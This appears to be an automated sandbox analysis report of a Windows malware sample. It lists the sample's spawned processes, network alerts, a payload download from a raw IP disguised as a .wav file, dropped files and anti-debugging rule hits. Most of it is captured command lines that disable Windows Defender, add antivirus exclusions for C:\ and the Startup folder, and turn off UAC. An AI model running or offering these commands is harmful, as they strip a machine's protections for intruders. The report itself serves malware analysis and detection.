Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | July 6, 2023, 5:01 p.m. | July 6, 2023, 5:04 p.m. |
-
-
-
powershell.exe powershell set-mppreference -exclusionpath C:\
2808
-
-
-
cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2976-
reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
3068 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
2076 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
2112 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
192 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
2200 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
2228 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
2444 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
2516 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
2664 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
2720 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
2780 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
2892 -
reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
2940 -
reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
2656 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
3008 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
2056 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
2100 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
2208 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
2952 -
reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
2788 -
reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
2484 -
reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
2584 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
2760 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
2868 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
2624 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
2708 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
1404 -
powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
284 -
powershell.exe powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
204 -
powershell.exe powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
2268 -
powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable"
1892 -
powershell.exe powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
2392
-
-
-
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 23.137.249.127:80 -> 192.168.56.101:49161 | 2017962 | ET MALWARE PE EXE or DLL Windows file download disguised as ASCII | A Network Trojan was detected |
TCP 23.137.249.127:80 -> 192.168.56.101:49161 | 2022640 | ET MALWARE PE EXE or DLL Windows file download Text M2 | A Network Trojan was detected |
TCP 23.137.249.127:80 -> 192.168.56.101:49161 | 2035769 | ET HUNTING [TW] Likely Hex Executable String | Misc activity |
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://23.137.249.127/efsdff3/frgsrgd/panel/uploads/Iprkfcbtfyj.wav |
request | GET http://23.137.249.127/efsdff3/frgsrgd/panel/uploads/Iprkfcbtfyj.wav |
file | C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat |
file | C:\Users\test22\AppData\Local\Temp\FFCC.tmp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
cmdline | "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\ |
cmdline | powershell set-mppreference -exclusionpath C:\ |
cmdline | cmd /c powershell set-mppreference -exclusionpath C:\ |
cmdline | powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled" |
cmdline | powershell.exe -command "Set-MpPreference -PUAProtection disable" |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
cmdline | powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force" |
cmdline | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" |
cmdline | powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'" |
cmdline | powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force |
cmdline | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
cmdline | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
cmdline | C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
cmdline | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
cmdline | powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'" |
cmdline | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
host | 23.137.249.127 | |||
host | 77.88.21.158 |
description | Wllcsochcbi.exe tried to sleep 2728263 seconds, actually delayed analysis time by 2728263 seconds |